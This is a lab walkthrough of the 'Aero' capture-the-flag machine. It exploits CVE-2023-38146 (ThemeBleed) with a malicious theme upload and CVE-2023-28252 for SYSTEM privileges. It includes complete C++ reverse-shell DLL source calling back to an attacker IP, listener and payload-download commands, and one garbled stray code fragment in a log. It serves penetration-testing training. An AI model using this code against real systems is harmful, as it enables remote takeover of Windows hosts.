Aero

Box info

Enumeration

Nmap

Let's start by enumerating ports using Nmap:

szczygielka@hacks$  nmap -sVC -p- 10.129.229.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 18:40 EST
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds

The scan result indicates that only port 80 with Microsoft-IIS/10.0 server is open.

Exploring website

After entering the IP address of the machine in the browser, we get the following page:

The description on the webpage indicates that the website is intended to allow users to upload themes for Windows 11 operating system:

Due to information found in Microsoft documentation, Windows themes should have .theme or .themepack extension. Now let's move on to file transfers:

Let's find an example .theme file, in our case it will be aero.theme and let's upload to the webpage:

The file upload seems to be working fine. Attempts to upload a file with an extension other than .theme or .themepack fails:

Let's search the Internet for information related to vulnerabilities connected with using theme files.

CVE-2023-38146

The search results lead us to the vulnerability identified as CVE-2023-38146, which may occur in the Windows 11 operating system. The documentation on Microsoft's website shows that this vulnerability may lead to remote code execution. This vulnerability might be exploited by loading the Windows theme file with access to an attacker-controlled SMB share.

Exploitation

We do not know what version of the Windows operating system we are dealing with, but searching results on Google indicates that Microsoft-IIS/10.0 was introduced with Windows Server 2016 and Windows 10. So we can assume that the operating system may also be Windows 11. Let's look for an exploit that we can use against the vulnerability we found.

PoC

The code exploiting the vulnerability can be found in the following repository:

LogoGitHub - gabe-k/themebleed: Proof-of-Concept for CVE-2023-38146 ("ThemeBleed")GitHub

Let's download the release of this repository first. The ThemeBleed.zip file we downloaded contains the following files:

szczygielka@hacks$ find . -type f -exec file {} \;
./ThemeBleed.pdb: MSVC program database ver 7.00, 512*95 bytes
./ThemeBleed.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./SMBLibrary.Win32.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./data/stage_1: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_2: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_3: PE32+ executable (DLL) (console) x86-64, for MS Windows, 7 sections
./SMBLibrary.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

The README file indicates that ThemeBleed.exe allows us to do 3 things: start the server, generate a .theme file referencing a specific host, or generate a .themepack file referencing a specific host. There are 3 binary files in the data directory: stage_1, stage_2 and stage_3. To create our payload we have to create a DDL with an exported name VerifyThemeVersion, and replace stage_3 with the library we created.

We want to create a DLL with a payload that would enable us to obtain a reverse shell. To create it we have to switch from Linux VM to Windows VM with Visual Studio installed. Walkthrough how to create your own DLL library using Visual Studio can be found here.

Let's open Visual Studio, select Create new project and then choose Dynamic-Link Library (DLL):

Let's name our solution stage_3. After creating the solution we should have the following files:

Let's add the rev_shell.cpp and rev_shell.h files to our project. After adding them, the project structure should look like this:

According to the information from the repository containing the exploit, we should add the export of VerifyThemeVersion function to our file rev_shell.h. Information on how to do that can be found on the Microsoft webpage. After adding an export our file rev_shell.h should look as follows:

#pragma once
extern "C" __declspec(dllexport) int VerifyThemeVersion(void);

Let's include rev_shell.h in the pch.h file. The pch.h file after including the header file:

// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.

#ifndef PCH_H
#define PCH_H

// add headers that you want to pre-compile here
#include "framework.h"
#include "rev_shell.h"

#endif //PCH_H

Let's move to the rev_shell.cpp file. First, let's find code in C++ that should allow us to get a reverse shell. In this case, we will use the code from the following repository:

LogoGitHub - tudorthe1ntruder/reverse-shell-poc: Custom C++ Reverse Shell POC | No AV Bypass Techniques or Tweaks Done | AVT Detection ratio: 2/61GitHub

After adapting the code to our problem, the rev_shell.cpp code looks as follows:

#include "pch.h"
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include "rev_shell.h"

#pragma comment(lib, "Ws2_32.lib")

#define REMOTE_ADDR "10.10.16.15"
#define REMOTE_PORT "443"


int VerifyThemeVersion(void)
{
	FreeConsole();
	WSADATA wsaData;
	int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	struct addrinfo* result = NULL, * ptr = NULL, hints;
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result);
	ptr = result;
	SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL);
	connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));
	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = (HANDLE)ConnectSocket;
	si.hStdOutput = (HANDLE)ConnectSocket;
	si.hStdError = (HANDLE)ConnectSocket;
	TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
	CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
	WaitForSingleObject(pi.hProcess, INFINITE);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	WSACleanup();
    	return 0;
}

Exploit from GitHub starts the SMB server on port 445. Therefore, before starting the server, we should check whether this port is not currently busy. We can check it via the following command: 

PS C:\Users\Szczygielka\Documents> netstat -aon | findstr 445
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4

To free port 445 we need to set the startup type of Server Windows service to Disable and reboot Windows VM. After that, we can prepare a malicious theme aero.theme via the following command:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.16.15 aero.theme

Let's start the server:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started

And let's run listener:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222

Now upload the prepared aero.theme file to the webpage:

In the console with the server running, we can see that thestage_3 library has been loaded:

PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 3 - LoadLibrary

Let's check if we managed to get the reverse shell:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 10.129.229.128:49679.
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Success! We received the reverse shell as a user sam.emerson:

C:\Windows\system32>whoami
whoami
aero\sam.emerson

User flag

The user flag can be obtained from C:\Users\sam.emerson\Desktop\user.txt.

Privilege escalation

In sam.emerson user Documents we found a pdf file which name is connected with one of the CVEs:

C:\Users\sam.emerson\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is C009-0DB2

 Directory of C:\Users\sam.emerson\Documents

09/21/2023  01:58 PM    <DIR>          .
09/20/2023  04:08 AM    <DIR>          ..
09/21/2023  08:18 AM            14,158 CVE-2023-28252_Summary.pdf
09/26/2023  12:06 PM             1,113 watchdog.ps1
               2 File(s)         15,271 bytes
               2 Dir(s)   6,129,287,168 bytes free

The easiest way to get CVE-2023-28252_Summary.pdf file is to encode it to Base64 and decode it using CyberChef. Let's change the console to PowerShell and encode the file via the following command:

PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))

Use the CyberChef to decode it from Base64:

Now save the file as CVE-2023-28252_Summary.pdf. Let's check its contents:

The pdf file contains information about CVE-2023-28252, which use may lead to privilege escalation. This document also indicates the existence of a security patch released by Microsoft in April 2023. Internet search results indicate that the patch for this vulnerability was released on April 11, 2023, and that Windows 11 may also be vulnerable.

Let's look for an exploit for this vulnerability:

LogoGitHub - fortra/CVE-2023-28252GitHub

Let's download the contents of the repository to the attacking virtual machine and open the solution using Visual Studio:

The solution only contains 1 .cpp file - clfs_eop.cpp file. Let's analyze its code:

At the end of the file, we can see that notepad.exe is executed if privilege escalation is successful. We want to change this payload so that it allows us to get a reverse shell as a system user. In this case, we will use PowerShell #3 (Base64) a payload from this website. Don't forget to change IP address and port number. Let's paste the reverse shell into the code instead of notepad.exe , and build the project to Release.

Now let's go to the directory where the compiled executable file clfs_eop.exe is located, and run a Python HTTP server:

PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...

Let's move to our target machine and download the file clfs_eop.exe via the following command:

wget http://10.10.16.15:10000/clfs_eop.exe -OutFile clfs_eop.exe

The file was downloaded:

PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
::ffff:10.129.229.128 - - [23/Feb/2024 15:46:07] "GET /clfs_eop.exe HTTP/1.1" 200 -const message = "hello world";
console.log(message);

Let's prepare the listener:

/PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080

And let's execute clfs_eop.exe on attacking machine:

PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10

In the listener, we received a connection:

PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.129.229.128:65249.
PS C:\Users\sam.emerson>

Let's check which user we are:

PS C:\Users\sam.emerson> whoami
nt authority\system

Root flag

The root flag can be obtained from the following location C:\Users\Administrator\Desktop\root.txt.

PreviousWindows MachinesNextVisual

Last updated